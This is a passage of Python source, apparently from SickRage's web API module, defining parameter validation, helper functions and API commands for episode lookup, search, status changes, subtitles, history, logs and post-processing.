AttributeError:\n pass\n\n # help\n if \'help\' in kwargs:\n self.run = self.return_help\n\n def run(self):\n # override with real output function in subclass\n return {}\n\n def return_help(self):\n try:\n if self._requiredParams:\n pass\n except AttributeError:\n self._requiredParams = []\n try:\n if self._optionalParams:\n pass\n except AttributeError:\n self._optionalParams = []\n\n for paramDict, paramType in [(self._requiredParams, ""requiredParameters""),\n (self._optionalParams, ""optionalParameters"")]:\n\n if paramType in self._help:\n for paramName in paramDict:\n if paramName not in self._help[paramType]:\n self._help[paramType][paramName] = {}\n if paramDict[paramName][""allowed_values""]:\n self._help[paramType][paramName][""allowed_values""] = paramDict[paramName][""allowed_values""]\n else:\n self._help[paramType][paramName][""allowed_values""] = ""see desc""\n self._help[paramType][paramName][""defaultValue""] = paramDict[paramName][""defaultValue""]\n self._help[paramType][paramName][""type""] = paramDict[paramName][""type""]\n\n elif paramDict:\n for paramName in paramDict:\n self._help[paramType] = {}\n self._help[paramType][paramName] = paramDict[paramName]\n else:\n self._help[paramType] = {}\n msg = ""No description available""\n if ""desc"" in self._help:\n msg = self._help[""desc""]\n return _responds(RESULT_SUCCESS, self._help, msg)\n\n def return_missing(self):\n if len(self._missing) == 1:\n msg = ""The required parameter: \'"" + self._missing[0] + ""\' was not set""\n else:\n msg = ""The required parameters: \'"" + ""\',\'"".join(self._missing) + ""\' where not set""\n return _responds(RESULT_ERROR, msg=msg)\n\n def check_params(self, args, kwargs, key, default, required, arg_type, allowed_values):\n\n """""" function to check passed params for the shorthand wrapper\n and to detect missing/required params\n """"""\n\n # auto-select indexer\n if key in indexer_ids:\n if ""tvdbid"" in kwargs:\n key = ""tvdbid""\n\n self.indexer = indexer_ids.index(key)\n\n missing = True\n org_default = default\n\n if arg_type == ""bool"":\n allowed_values = [0, 1]\n\n if args:\n default = args[0]\n missing = False\n args = args[1:]\n if kwargs.get(key):\n default = kwargs.get(key)\n missing = False\n if required:\n try:\n self._missing\n self._requiredParams.append(key)\n except AttributeError:\n self._missing = []\n self._requiredParams = {key: {""allowed_values"": allowed_values,\n ""defaultValue"": org_default,\n ""type"": arg_type}}\n\n if missing and key not in self._missing:\n self._missing.append(key)\n else:\n try:\n self._optionalParams[key] = {""allowed_values"": allowed_values,\n ""defaultValue"": org_default,\n ""type"": arg_type}\n except AttributeError:\n self._optionalParams = {key: {""allowed_values"": allowed_values,\n ""defaultValue"": org_default,\n ""type"": arg_type}}\n\n if default:\n default = self._check_param_type(default, key, arg_type)\n if arg_type == ""bool"":\n arg_type = []\n self._check_param_value(default, key, allowed_values)\n\n return default, args\n\n def _check_param_type(self, value, name, arg_type):\n """""" checks if value can be converted / parsed to arg_type\n will raise an error on failure\n or will convert it to arg_type and return new converted value\n can check for:\n - int: will be converted into int\n - bool: will be converted to False / True\n - list: will always return a list\n - string: will do nothing for now\n - ignore: will ignore it, just like ""string""\n """"""\n error = False\n if arg_type == ""int"":\n if _is_int(value):\n value = int(value)\n else:\n error = True\n elif arg_type == ""bool"":\n if value in (""0"", ""1""):\n value = bool(int(value))\n elif value in (""true"", ""True"", ""TRUE""):\n value = True\n elif value in (""false"", ""False"", ""FALSE""):\n value = False\n elif value not in (True, False):\n error = True\n elif arg_type == ""list"":\n value = value.split(""|"")\n elif arg_type == ""string"":\n pass\n elif arg_type == ""ignore"":\n pass\n else:\n logger.log(u\'API :: Invalid param type: ""%s"" can not be checked. Ignoring it.\' % str(arg_type), logger.ERROR)\n\n if error:\n # this is a real ApiError !!\n raise ApiError(u\'param ""%s"" with given value ""%s"" could not be parsed into ""%s""\'\n % (str(name), str(value), str(arg_type)))\n\n return value\n\n def _check_param_value(self, value, name, allowed_values):\n """""" will check if value (or all values in it ) are in allowed values\n will raise an exception if value is ""out of range""\n if bool(allowed_value) is False a check is not performed and all values are excepted\n """"""\n if allowed_values:\n error = False\n if isinstance(value, list):\n for item in value:\n if item not in allowed_values:\n error = True\n else:\n if value not in allowed_values:\n error = True\n\n if error:\n # this is kinda a ApiError but raising an error is the only way of quitting here\n raise ApiError(u""param: \'"" + str(name) + ""\' with given value: \'"" + str(\n value) + ""\' is out of allowed range \'"" + str(allowed_values) + ""\'"")\n\n\nclass TVDBShorthandWrapper(ApiCall):\n _help = {""desc"": ""This is an internal function wrapper. Call the help command directly for more information.""}\n\n def __init__(self, args, kwargs, sid):\n self.origArgs = args\n self.kwargs = kwargs\n self.sid = sid\n\n self.s, args = self.check_params(args, kwargs, ""s"", None, False, ""ignore"", [])\n self.e, args = self.check_params(args, kwargs, ""e"", None, False, ""ignore"", [])\n self.args = args\n\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" internal function wrapper """"""\n args = (self.sid,) + self.origArgs\n if self.e:\n return CMD_Episode(args, self.kwargs).run()\n elif self.s:\n return CMD_ShowSeasons(args, self.kwargs).run()\n else:\n return CMD_Show(args, self.kwargs).run()\n\n\n# ###############################\n# helper functions #\n# ###############################\n\ndef _is_int(data):\n try:\n int(data)\n except (TypeError, ValueError, OverflowError):\n return False\n else:\n return True\n\n\ndef _rename_element(dict_obj, old_key, new_key):\n try:\n dict_obj[new_key] = dict_obj[old_key]\n del dict_obj[old_key]\n except (ValueError, TypeError, NameError):\n pass\n return dict_obj\n\n\ndef _responds(result_type, data=None, msg=""""):\n """"""\n result is a string of given ""type"" (success/failure/timeout/error)\n message is a human readable string, can be empty\n data is either a dict or a array, can be a empty dict or empty array\n """"""\n return {""result"": result_type_map[result_type],\n ""message"": msg,\n ""data"": {} if not data else data}\n\n\ndef _get_status_strings(s):\n return statusStrings[s]\n\n\ndef _ordinal_to_datetime_form(ordinal):\n # workaround for episodes with no air date\n if int(ordinal) != 1:\n date = datetime.date.fromordinal(ordinal)\n else:\n return """"\n return date.strftime(dateTimeFormat)\n\n\ndef _ordinal_to_date_form(ordinal):\n if int(ordinal) != 1:\n date = datetime.date.fromordinal(ordinal)\n else:\n return """"\n return date.strftime(dateFormat)\n\n\ndef _history_date_to_datetime_form(time_string):\n date = datetime.datetime.strptime(time_string, History.date_format)\n return date.strftime(dateTimeFormat)\n\n\ndef _map_quality(show_obj):\n quality_map = _get_quality_map()\n\n any_qualities = []\n best_qualities = []\n\n i_quality_id, a_quality_id = Quality.splitQuality(int(show_obj))\n if i_quality_id:\n for quality in i_quality_id:\n any_qualities.append(quality_map[quality])\n if a_quality_id:\n for quality in a_quality_id:\n best_qualities.append(quality_map[quality])\n return any_qualities, best_qualities\n\n\ndef _get_quality_map():\n return {Quality.SDTV: \'sdtv\',\n Quality.SDDVD: \'sddvd\',\n Quality.HDTV: \'hdtv\',\n Quality.RAWHDTV: \'rawhdtv\',\n Quality.FULLHDTV: \'fullhdtv\',\n Quality.HDWEBDL: \'hdwebdl\',\n Quality.FULLHDWEBDL: \'fullhdwebdl\',\n Quality.HDBLURAY: \'hdbluray\',\n Quality.FULLHDBLURAY: \'fullhdbluray\',\n Quality.UNKNOWN: \'unknown\'}\n\n\ndef _get_root_dirs():\n if sickbeard.ROOT_DIRS == """":\n return {}\n\n root_dir = {}\n root_dirs = sickbeard.ROOT_DIRS.split(\'|\')\n default_index = int(sickbeard.ROOT_DIRS.split(\'|\')[0])\n\n root_dir[""default_index""] = int(sickbeard.ROOT_DIRS.split(\'|\')[0])\n # remove default_index value from list (this fixes the offset)\n root_dirs.pop(0)\n\n if len(root_dirs) < default_index:\n return {}\n\n # clean up the list - replace %xx escapes by their single-character equivalent\n root_dirs = [urllib.unquote_plus(x) for x in root_dirs]\n\n default_dir = root_dirs[default_index]\n\n dir_list = []\n for root_dir in root_dirs:\n valid = 1\n try:\n ek(os.listdir, root_dir)\n except Exception:\n valid = 0\n default = 0\n if root_dir is default_dir:\n default = 1\n\n cur_dir = {\n \'valid\': valid,\n \'location\': root_dir,\n \'default\': default\n }\n dir_list.append(cur_dir)\n\n return dir_list\n\n\nclass ApiError(Exception):\n """"""\n Generic API error\n """"""\n\n\nclass IntParseError(Exception):\n """"""\n A value could not be parsed into an int, but should be parse-able to an int\n """"""\n\n\n# -------------------------------------------------------------------------------------#\n\n\nclass CMD_Help(ApiCall):\n _help = {\n ""desc"": ""Get help about a given command"",\n ""optionalParameters"": {\n ""subject"": {""desc"": ""The name of the command to get the help of""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.subject, args = self.check_params(args, kwargs, ""subject"", ""help"", False, ""string"", function_mapper.keys())\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get help about a given command """"""\n if self.subject in function_mapper:\n out = _responds(RESULT_SUCCESS, function_mapper.get(self.subject)((), {""help"": 1}).run())\n else:\n out = _responds(RESULT_FAILURE, msg=""No such cmd"")\n return out\n\n\nclass CMD_ComingEpisodes(ApiCall):\n _help = {\n ""desc"": ""Get the coming episodes"",\n ""optionalParameters"": {\n ""sort"": {""desc"": ""Change the sort order""},\n ""type"": {""desc"": ""One or more categories of coming episodes, separated by |""},\n ""paused"": {\n ""desc"": ""0 to exclude paused shows, 1 to include them, or omitted to use SickRage default value""\n },\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.sort, args = self.check_params(args, kwargs, ""sort"", ""date"", False, ""string"", ComingEpisodes.sorts.keys())\n self.type, args = self.check_params(args, kwargs, ""type"", \'|\'.join(ComingEpisodes.categories), False, ""list"",\n ComingEpisodes.categories)\n self.paused, args = self.check_params(args, kwargs, ""paused"", bool(sickbeard.COMING_EPS_DISPLAY_PAUSED), False,\n ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the coming episodes """"""\n grouped_coming_episodes = ComingEpisodes.get_coming_episodes(self.type, self.sort, True, self.paused)\n data = {section: [] for section in grouped_coming_episodes.keys()}\n\n for section, coming_episodes in grouped_coming_episodes.iteritems():\n for coming_episode in coming_episodes:\n data[section].append({\n \'airdate\': coming_episode[\'airdate\'],\n \'airs\': coming_episode[\'airs\'],\n \'ep_name\': coming_episode[\'name\'],\n \'ep_plot\': coming_episode[\'description\'],\n \'episode\': coming_episode[\'episode\'],\n \'indexerid\': coming_episode[\'indexer_id\'],\n \'network\': coming_episode[\'network\'],\n \'paused\': coming_episode[\'paused\'],\n \'quality\': coming_episode[\'quality\'],\n \'season\': coming_episode[\'season\'],\n \'show_name\': coming_episode[\'show_name\'],\n \'show_status\': coming_episode[\'status\'],\n \'tvdbid\': coming_episode[\'tvdbid\'],\n \'weekday\': coming_episode[\'weekday\']\n })\n\n return _responds(RESULT_SUCCESS, data)\n\n\nclass CMD_Episode(ApiCall):\n _help = {\n ""desc"": ""Get detailed information about an episode"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""season"": {""desc"": ""The season number""},\n ""episode"": {""desc"": ""The episode number""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""full_path"": {\n ""desc"": ""Return the full absolute show location (if valid, and True), or the relative show location""\n },\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", [])\n self.e, args = self.check_params(args, kwargs, ""episode"", None, True, ""int"", [])\n # optional\n self.fullPath, args = self.check_params(args, kwargs, ""full_path"", False, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get detailed information about an episode """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n my_db = db.DBConnection(row_type=""dict"")\n sql_results = my_db.select(\n ""SELECT name, description, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND episode = ? AND season = ?"",\n [self.indexerid, self.e, self.s])\n if not len(sql_results) == 1:\n raise ApiError(""Episode not found"")\n episode = sql_results[0]\n # handle path options\n # absolute vs relative vs broken\n show_path = None\n try:\n show_path = show_obj.location\n except ShowDirectoryNotFoundException:\n pass\n\n if not show_path: # show dir is broken ... episode path will be empty\n episode[""location""] = """"\n elif not self.fullPath:\n # using the length because lstrip() removes to much\n show_path_length = len(show_path) + 1 # the / or \\ yeah not that nice i know\n episode[""location""] = episode[""location""][show_path_length:]\n\n # convert stuff to human form\n if helpers.tryInt(episode[\'airdate\'], 1) > 693595: # 1900\n episode[\'airdate\'] = sbdatetime.sbdatetime.sbfdate(sbdatetime.sbdatetime.convert_to_setting(\n network_timezones.parse_date_time(int(episode[\'airdate\']), show_obj.airs, show_obj.network)), d_preset=dateFormat)\n else:\n episode[\'airdate\'] = \'Never\'\n\n status, quality = Quality.splitCompositeStatus(int(episode[""status""]))\n episode[""status""] = _get_status_strings(status)\n episode[""quality""] = get_quality_string(quality)\n episode[""file_size_human""] = pretty_file_size(episode[""file_size""])\n\n return _responds(RESULT_SUCCESS, episode)\n\n\nclass CMD_EpisodeSearch(ApiCall):\n _help = {\n ""desc"": ""Search for an episode. The response might take some time."",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""season"": {""desc"": ""The season number""},\n ""episode"": {""desc"": ""The episode number""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", [])\n self.e, args = self.check_params(args, kwargs, ""episode"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Search for an episode """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n # retrieve the episode object and fail if we can\'t get one\n ep_obj = show_obj.getEpisode(int(self.s), int(self.e))\n if isinstance(ep_obj, str):\n return _responds(RESULT_FAILURE, msg=""Episode not found"")\n\n # make a queue item for it and put it on the queue\n ep_queue_item = search_queue.ManualSearchQueueItem(show_obj, ep_obj)\n sickbeard.searchQueueScheduler.action.add_item(ep_queue_item) # @UndefinedVariable\n\n # wait until the queue item tells us whether it worked or not\n while ep_queue_item.success is None: # @UndefinedVariable\n time.sleep(1)\n\n # return the correct json value\n if ep_queue_item.success:\n status, quality = Quality.splitCompositeStatus(ep_obj.status) # @UnusedVariable\n # TODO: split quality and status?\n return _responds(RESULT_SUCCESS, {""quality"": get_quality_string(quality)},\n ""Snatched ("" + get_quality_string(quality) + "")"")\n\n return _responds(RESULT_FAILURE, msg=\'Unable to find episode\')\n\n\nclass CMD_EpisodeSetStatus(ApiCall):\n _help = {\n ""desc"": ""Set the status of an episode or a season (when no episode is provided)"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""season"": {""desc"": ""The season number""},\n ""status"": {""desc"": ""The status of the episode or season""}\n },\n ""optionalParameters"": {\n ""episode"": {""desc"": ""The episode number""},\n ""force"": {""desc"": ""True to replace existing downloaded episode or season, False otherwise""},\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", [])\n self.status, args = self.check_params(args, kwargs, ""status"", None, True, ""string"",\n [""wanted"", ""skipped"", ""ignored"", ""failed""])\n # optional\n self.e, args = self.check_params(args, kwargs, ""episode"", None, False, ""int"", [])\n self.force, args = self.check_params(args, kwargs, ""force"", False, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Set the status of an episode or a season (when no episode is provided) """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n # convert the string status to a int\n for status in statusStrings:\n if str(statusStrings[status]).lower() == str(self.status).lower():\n self.status = status\n break\n else: # if we don\'t break out of the for loop we got here.\n # the allowed values has at least one item that could not be matched against the internal status strings\n raise ApiError(""The status string could not be matched to a status. Report to Devs!"")\n\n ep_list = []\n if self.e:\n ep_obj = show_obj.getEpisode(self.s, self.e)\n if not ep_obj:\n return _responds(RESULT_FAILURE, msg=""Episode not found"")\n ep_list = [ep_obj]\n else:\n # get all episode numbers from self, season\n ep_list = show_obj.getAllEpisodes(season=self.s)\n\n def _ep_result(result_code, ep, msg=""""):\n return {\'season\': ep.season, \'episode\': ep.episode, \'status\': _get_status_strings(ep.status),\n \'result\': result_type_map[result_code], \'message\': msg}\n\n ep_results = []\n failure = False\n start_backlog = False\n segments = {}\n\n sql_l = []\n for ep_obj in ep_list:\n with ep_obj.lock:\n if self.status == WANTED:\n # figure out what episodes are wanted so we can backlog them\n if ep_obj.season in segments:\n segments[ep_obj.season].append(ep_obj)\n else:\n segments[ep_obj.season] = [ep_obj]\n\n # don\'t let them mess up UN-AIRED episodes\n if ep_obj.status == UNAIRED:\n if self.e is not None: # setting the status of an un-aired is only considered a failure if we directly wanted this episode, but is ignored on a season request\n ep_results.append(\n _ep_result(RESULT_FAILURE, ep_obj, ""Refusing to change status because it is UN-AIRED""))\n failure = True\n continue\n\n if self.status == FAILED and not sickbeard.USE_FAILED_DOWNLOADS:\n ep_results.append(_ep_result(RESULT_FAILURE, ep_obj, ""Refusing to change status to FAILED because failed download handling is disabled""))\n failure = True\n continue\n\n # allow the user to force setting the status for an already downloaded episode\n if ep_obj.status in Quality.DOWNLOADED + Quality.ARCHIVED and not self.force:\n ep_results.append(_ep_result(RESULT_FAILURE, ep_obj, ""Refusing to change status because it is already marked as DOWNLOADED""))\n failure = True\n continue\n\n ep_obj.status = self.status\n sql_l.append(ep_obj.get_sql())\n\n if self.status == WANTED:\n start_backlog = True\n ep_results.append(_ep_result(RESULT_SUCCESS, ep_obj))\n\n if len(sql_l) > 0:\n my_db = db.DBConnection()\n my_db.mass_action(sql_l)\n\n extra_msg = """"\n if start_backlog:\n for season, segment in segments.iteritems():\n cur_backlog_queue_item = search_queue.BacklogQueueItem(show_obj, segment)\n sickbeard.searchQueueScheduler.action.add_item(cur_backlog_queue_item) # @UndefinedVariable\n\n logger.log(u""API :: Starting backlog for "" + show_obj.name + "" season "" + str(\n season) + "" because some episodes were set to WANTED"")\n\n extra_msg = "" Backlog started""\n\n if failure:\n return _responds(RESULT_FAILURE, ep_results, \'Failed to set all or some status. Check data.\' + extra_msg)\n else:\n return _responds(RESULT_SUCCESS, msg=\'All status set successfully.\' + extra_msg)\n\n\nclass CMD_SubtitleSearch(ApiCall):\n _help = {\n ""desc"": ""Search for an episode subtitles. The response might take some time."",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""season"": {""desc"": ""The season number""},\n ""episode"": {""desc"": ""The episode number""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", [])\n self.e, args = self.check_params(args, kwargs, ""episode"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Search for an episode subtitles """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n # retrieve the episode object and fail if we can\'t get one\n ep_obj = show_obj.getEpisode(int(self.s), int(self.e))\n if isinstance(ep_obj, str):\n return _responds(RESULT_FAILURE, msg=""Episode not found"")\n\n # try do download subtitles for that episode\n previous_subtitles = ep_obj.subtitles\n\n try:\n subtitles = ep_obj.download_subtitles()\n except Exception:\n return _responds(RESULT_FAILURE, msg=\'Unable to find subtitles\')\n\n # return the correct json value\n new_subtitles = frozenset(ep_obj.subtitles).difference(previous_subtitles)\n if new_subtitles:\n new_languages = [subtitles.name_from_code(code) for code in new_subtitles]\n status = \'New subtitles downloaded: %s\' % \', \'.join(new_languages)\n response = _responds(RESULT_SUCCESS, msg=\'New subtitles found\')\n else:\n status = \'No subtitles downloaded\'\n response = _responds(RESULT_FAILURE, msg=\'Unable to find subtitles\')\n\n ui.notifications.message(\'Subtitles Search\', status)\n\n return response\n\n\nclass CMD_Exceptions(ApiCall):\n _help = {\n ""desc"": ""Get the scene exceptions for all or a given show"",\n ""optionalParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, False, ""int"", [])\n\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the scene exceptions for all or a given show """"""\n my_db = db.DBConnection(""cache.db"", row_type=""dict"")\n\n if self.indexerid is None:\n sql_results = my_db.select(""SELECT show_name, indexer_id AS \'indexerid\' FROM scene_exceptions"")\n scene_exceptions = {}\n for row in sql_results:\n indexerid = row[""indexerid""]\n if indexerid not in scene_exceptions:\n scene_exceptions[indexerid] = []\n scene_exceptions[indexerid].append(row[""show_name""])\n\n else:\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n sql_results = my_db.select(\n ""SELECT show_name, indexer_id AS \'indexerid\' FROM scene_exceptions WHERE indexer_id = ?"",\n [self.indexerid])\n scene_exceptions = []\n for row in sql_results:\n scene_exceptions.append(row[""show_name""])\n\n return _responds(RESULT_SUCCESS, scene_exceptions)\n\n\nclass CMD_History(ApiCall):\n _help = {\n ""desc"": ""Get the downloaded and/or snatched history"",\n ""optionalParameters"": {\n ""limit"": {""desc"": ""The maximum number of results to return""},\n ""type"": {""desc"": ""Only get some entries. No value will returns every type""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.limit, args = self.check_params(args, kwargs, ""limit"", 100, False, ""int"", [])\n self.type, args = self.check_params(args, kwargs, ""type"", None, False, ""string"", [""downloaded"", ""snatched""])\n self.type = self.type.lower() if isinstance(self.type, str) else \'\'\n\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the downloaded and/or snatched history """"""\n data = History().get(self.limit, self.type)\n results = []\n\n for row in data:\n status, quality = Quality.splitCompositeStatus(int(row[""action""]))\n status = _get_status_strings(status)\n\n if self.type and not status.lower() == self.type:\n continue\n\n row[""status""] = status\n row[""quality""] = get_quality_string(quality)\n row[""date""] = _history_date_to_datetime_form(str(row[""date""]))\n\n del row[""action""]\n\n _rename_element(row, ""show_id"", ""indexerid"")\n row[""resource_path""] = ek(os.path.dirname, row[""resource""])\n row[""resource""] = ek(os.path.basename, row[""resource""])\n\n # Add tvdbid for backward compatibility\n row[\'tvdbid\'] = row[\'indexerid\']\n results.append(row)\n\n return _responds(RESULT_SUCCESS, results)\n\n\nclass CMD_HistoryClear(ApiCall):\n _help = {""desc"": ""Clear the entire history""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Clear the entire history """"""\n History().clear()\n\n return _responds(RESULT_SUCCESS, msg=""History cleared"")\n\n\nclass CMD_HistoryTrim(ApiCall):\n _help = {""desc"": ""Trim history entries older than 30 days""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Trim history entries older than 30 days """"""\n History().trim()\n\n return _responds(RESULT_SUCCESS, msg=\'Removed history entries older than 30 days\')\n\n\nclass CMD_Failed(ApiCall):\n _help = {\n ""desc"": ""Get the failed downloads"",\n ""optionalParameters"": {\n ""limit"": {""desc"": ""The maximum number of results to return""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.limit, args = self.check_params(args, kwargs, ""limit"", 100, False, ""int"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the failed downloads """"""\n\n my_db = db.DBConnection(\'failed.db\', row_type=""dict"")\n\n u_limit = min(int(self.limit), 100)\n if u_limit == 0:\n sql_results = my_db.select(""SELECT * FROM failed"")\n else:\n sql_results = my_db.select(""SELECT * FROM failed LIMIT ?"", [u_limit])\n\n return _responds(RESULT_SUCCESS, sql_results)\n\n\nclass CMD_Backlog(ApiCall):\n _help = {""desc"": ""Get the backlogged episodes""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the backlogged episodes """"""\n\n shows = []\n\n my_db = db.DBConnection(row_type=""dict"")\n for curShow in sickbeard.showList:\n\n show_eps = []\n\n sql_results = my_db.select(\n ""SELECT tv_episodes.*, tv_shows.paused FROM tv_episodes INNER JOIN tv_shows ON tv_episodes.showid = tv_shows.indexer_id WHERE showid = ? and paused = 0 ORDER BY season DESC, episode DESC"",\n [curShow.indexerid])\n\n for curResult in sql_results:\n\n cur_ep_cat = curShow.getOverview(int(curResult[""status""] or -1))\n if cur_ep_cat and cur_ep_cat in (Overview.WANTED, Overview.QUAL):\n show_eps.append(curResult)\n\n if show_eps:\n shows.append({\n ""indexerid"": curShow.indexerid,\n ""show_name"": curShow.name,\n ""status"": curShow.status,\n ""episodes"": show_eps\n })\n\n return _responds(RESULT_SUCCESS, shows)\n\n\nclass CMD_Logs(ApiCall):\n _help = {\n ""desc"": ""Get the logs"",\n ""optionalParameters"": {\n ""min_level"": {\n ""desc"":\n ""The minimum level classification of log entries to return. ""\n ""Each level inherits its above levels: debug < info < warning < error""\n },\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.min_level, args = self.check_params(args, kwargs, ""min_level"", ""error"", False, ""string"",\n [""error"", ""warning"", ""info"", ""debug""])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the logs """"""\n # 10 = Debug / 20 = Info / 30 = Warning / 40 = Error\n min_level = logger.reverseNames[str(self.min_level).upper()]\n\n data = []\n if ek(os.path.isfile, logger.logFile):\n with io.open(logger.logFile, \'r\', encoding=\'utf-8\') as f:\n data = f.readlines()\n\n regex = r""^(\\d\\d\\d\\d)\\-(\\d\\d)\\-(\\d\\d)\\s*(\\d\\d)\\:(\\d\\d):(\\d\\d)\\s*([A-Z]+)\\s*(.+?)\\s*\\:\\:\\s*(.*)$""\n\n final_data = []\n\n num_lines = 0\n last_line = False\n num_to_show = min(50, len(data))\n\n for x in reversed(data):\n\n match = re.match(regex, x)\n\n if match:\n level = match.group(7)\n if level not in logger.reverseNames:\n last_line = False\n continue\n\n if logger.reverseNames[level] >= min_level:\n last_line = True\n final_data.append(x.rstrip(""\\n""))\n else:\n last_line = False\n continue\n\n elif last_line:\n final_data.append(""AA"" + x)\n\n num_lines += 1\n\n if num_lines >= num_to_show:\n break\n\n return _responds(RESULT_SUCCESS, final_data)\n\n\nclass CMD_PostProcess(ApiCall):\n _help = {\n ""desc"": ""Manually post-process the files in the download folder"",\n ""optionalParameters"": {\n ""path"": {""desc"": ""The path to the folder to post-process""},\n ""force_replace"": {""desc"": ""Force already post-processed files to be post-processed again""},\n ""return_data"": {""desc"": ""Returns the result of the post-process""},\n ""process_method"": {""desc"": ""How should valid post-processed files be handled""},\n ""is_priority"": {""desc"": ""Replace the file even if it exists in a higher quality""},\n ""failed"": {""desc"": ""Mark download as failed""},\n ""type"": {""desc"": ""The type of post-process being requested""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.path, args = self.check_params(args, kwargs, ""path"", None, False, ""string"", [])\n self.force_replace, args = self.check_params(args, kwargs, ""force_replace"", False, False, ""bool"", [])\n self.return_data, args = self.check_params(args, kwargs, ""return_data"", False, False, ""bool"", [])\n self.process_method, args = self.check_params(args, kwargs, ""process_method"", False, False, ""string"",\n [""copy"", ""symlink"", ""hardlink"", ""move""])\n self.is_priority, args = self.check_params(args, kwargs, ""is_priority"", False, False, ""bool"", [])\n self.failed, args = self.check_params(args, kwargs, ""failed"", False, False, ""bool"", [])\n self.type, args = self.check_params(args, kwargs, ""type"", ""auto"", None, ""string"", [""auto"", ""manual""])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Manually post-process the files in the download folder """"""\n if not self.path and not sickbeard.TV_DOWNLOAD_DIR:\n return _responds(RESULT_FAILURE, msg=""You need to provide a path or set TV Download Dir"")\n\n if not self.path:\n self.path = sickbeard.TV_DOWNLOAD_DIR\n\n if not self.type:\n self.type = \'manual\'\n\n data = processTV.processDir(self.path, process_method=self.process_method, force=self.force_replace,\n is_priority=self.is_priority, failed=self.failed, proc_type=self.type)\n\n if not self.return_data:\n data = """"\n\n return _responds(RESULT_SUCCESS, data=data, msg=""Started post-process for %s"" % self.path)\n\n\nclass CMD_SickBeard(ApiCall):\n _help = {""desc"": ""Get miscellaneous information about SickRage""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" dGet miscellaneous information about SickRage """"""\n data = {""sr_version"": sickbeard.BRANCH, ""api_version"": self.version,\n ""api_commands"": sorted(function_mapper.keys())}\n return _responds(RESULT_SUCCESS, data)\n\n\nclass CMD_SickBeardAddRootDir(ApiCall):\n _help = {\n ""desc"": ""Add a new root (parent) directory to SickRage"",\n ""requiredParameters"": {\n ""location"": {""desc"": ""The full path to the new 